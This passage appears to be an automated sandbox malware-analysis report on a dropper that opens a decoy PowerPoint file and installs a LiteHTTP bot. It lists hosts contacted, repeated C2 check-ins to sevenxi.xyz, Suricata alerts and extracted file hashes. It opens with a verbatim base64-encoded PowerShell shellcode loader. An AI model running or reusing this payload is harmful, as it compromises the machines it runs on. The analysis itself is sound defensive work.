eAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A
(PID: 3508)
- POWERPNT.EXE "%TEMP%\energies.ppt" (PID: 3664)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
sevenxi.xyz | 185.117.75.48 | - | Netherlands |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
91.160.159.49 |
4444
TCP |
powershell.exe PID: 2444 |
France |
185.117.75.48 |
80
TCP |
0xp.exe PID: 2288 |
Netherlands |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive 100 Continue More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
Extracted Strings
Extracted Files
-
Informative Selection 7
-
-
GB9R5TCIOUEB9XX9HLKX.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3508)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
ZXDHRFEVKQIGKVFQV7CC.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2444)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
6ljpalv5.cmdline
- Size
- 313B (313 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- cf5b2f82869a2ee45430221b4d8b80ff
- SHA1
- 57005f1c93b8c60e21d784c27a418b35dfcc59ff
- SHA256
- 7e215c422f03d69ae653398a55e406da6de65fb988b44e2b3b4cfd4541f53e0d
-
CSCA6C9.tmp
- Size
- 652B (652 bytes)
- Type
- unknown
- Description
- MSVC .res
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- fbdaf9f1365ec5bed999116a74c4f6e9
- SHA1
- 4b96b633083c074fb54a1106b7fa2eb009e7a483
- SHA256
- 6e85a72fdf202930d0b754aca2f51818f662be58af7d871e6be2e0d2db6daf53
-
RESA6DE.tmp
- Size
- 1.2KiB (1204 bytes)
- Type
- unknown
- Description
- 80386 COFF executable not stripped - version 25189
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 26915401736497bb9342f319170597b7
- SHA1
- 9e6fdcebd7b43912ffbef64e5c30823dd2ddb9b0
- SHA256
- 0b900221bf0695018c4161b103770802ce60150c0d398430e923fafd58bd464e
-
energies.ppt
- Size
- 2MiB (2051584 bytes)
- Type
- ppt office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Title: Gabarit formation STI2D, Author: GRANJON David, Last Saved By: ENAULT, Revision Number: 453, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 3d+07:31:43, Last Printed: Wed Feb 15 10:56:10 2012, Create Time/Date: Tue Sep 14 06:05:30 2010, Last Saved Time/Date: Mon Mar 26 10:55:04 2012, Number of Words: 2411
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- d3c684b7ecce11ad8bf994dc172969a2
- SHA1
- e30ca5284c74376c238b23853e1c542fd56c1567
- SHA256
- 2deab96f57eba7b2bec1967ee3374b4703ff5183a6df0a5291906af46e9899ad
-
local.bat
- Size
- 6.9KiB (7110 bytes)
- Type
- text
- Description
- ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- cbde8477c4eca8f816514bd20b313dc3
- SHA1
- 3ebbbdc5e7fbe545f746da16899f7bc67ee207eb
- SHA256
- c5d3094458e672bfe18bd06f7db97e0a5da3b9239b912650420f2036acf435dd
-
-
Informative 11
-
-
energies.LNK
- Size
- 1.1KiB (1161 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 20 22:39:57 2017, mtime=Mon Nov 20 22:39:57 2017, atime=Mon Nov 20 22:39:57 2017, length=2051584, window=hide
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 003a242e3b8ccf6801261bbc5568181b
- SHA1
- 5f044ff0dbc40ddf3ab2cd61ab166ca27bf58c7d
- SHA256
- b2611be59dd817b2ff6b4b1b516a1b76d75015a8d529d61f8ff8cb6e840fe17a
-
index.dat
- Size
- 145B (145 bytes)
- Type
- data
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- ab40edc4dbd8e4eb22f9deceb7bc5ce0
- SHA1
- ebce1cf674e8dc1f7160a75d499724d57f19db2e
- SHA256
- 10e9cc4685a0c29f692900d61c80b2870616108a027cd30070d0f920ef26ea3f
-
K4R3057IRAU7L1AL6CBG.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3596)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
565950BA.wmf
- Size
- 27KiB (27220 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 64ef32ef95c729abf26d8ad29f10144d
- SHA1
- 4ebf3a90f19db422194eb8b43700c66d1ddacc16
- SHA256
- 889066483bbeb31528422ef1065b62bc31b74748fc8b8340dfafd5df6cb89c12
-
565AB65D.wmf
- Size
- 3.9KiB (4008 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- eda307d1737ee1d4e8e09f00302e145b
- SHA1
- d89e8b60c2cf9f662fd50ce2802641d98754f320
- SHA256
- 978e16611768ecc6481f05573204bbffd8f2c9955e4f38df5687b1703d9250ef
-
DADD3573.wmf
- Size
- 17KiB (17514 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 99e946e0e7fa064a272336973441f6bd
- SHA1
- a882a12029a8aef832bb376d2ab05e6c17d18775
- SHA256
- c48de83c8f28c89e64972391a78cc1193eb0cf0d99f26c760b3da20b7f5ef291
-
0XP.exe
- Size
- 21KiB (21504 bytes)
- Type
- peexe assembly executable
- Description
- PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- 195910f74e0fdfd6de16c704d930c218
- SHA1
- 57167534825e3cfe3a4dde91291b76d4af3b056b
- SHA256
- d68eb898dcef9cea1da659ea5ae5540f7059ece31e69c1f27b7a00e24524121f
-
6ljpalv5.0.cs
- Size
- 557B (557 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 7319070c34daa5f6f2ece2dfc07119ee
- SHA1
- f26a4a48518a5608e93c8b77368f588b0433973c
- SHA256
- b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
-
6ljpalv5.dll
- Size
- 3.5KiB (3584 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- f09698c73ed8c5653e1bd8250689aa9b
- SHA1
- 77efd415ce433c0e2a86bcd568d0453e9164b41f
- SHA256
- 2be1edd06693e89eb1447b29adf44a1e735ea6447558bdc940314f2e991cb126
-
6ljpalv5.out
- Size
- 578B (578 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- a4d61d4030d34044683590463f821ffb
- SHA1
- 0610cf47b1f05b438e2af6a6fea0ce5f7248363f
- SHA256
- 393935b16bfc5ca3f580a0457d54718b5c6ecaafb6c62c539dde3548741f9cda
-
6ljpalv5.pdb
- Size
- 7.5KiB (7680 bytes)
- Type
- data
- Description
- MSVC program database ver \002
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 7abe06b2b59c8a14b935bbde3b968c47
- SHA1
- ff11c8db44ea57572ea39375a39f099628f65b36
- SHA256
- a73a1e7dc77ca70078757f9d9ae6341442b0352fe2eae6e093c8b0ce837251b3
-
Notifications
-
Runtime
- Not all file accesses are visible for cmd.exe (PID: 2280)
- Not all file accesses are visible for csc.exe (PID: 2636)
- Not all file accesses are visible for cvtres.exe (PID: 3780)
- Not all file accesses are visible for mode.com (PID: 3512)
- Not all file accesses are visible for powershell.exe (PID: 2444)
- Not all file accesses are visible for powershell.exe (PID: 3508)
- Not all file accesses are visible for powershell.exe (PID: 3596)
- Not all sources for signature ID "api-51" are available in the report
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "api-70" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-1" are available in the report
- Not all sources for signature ID "registry-25" are available in the report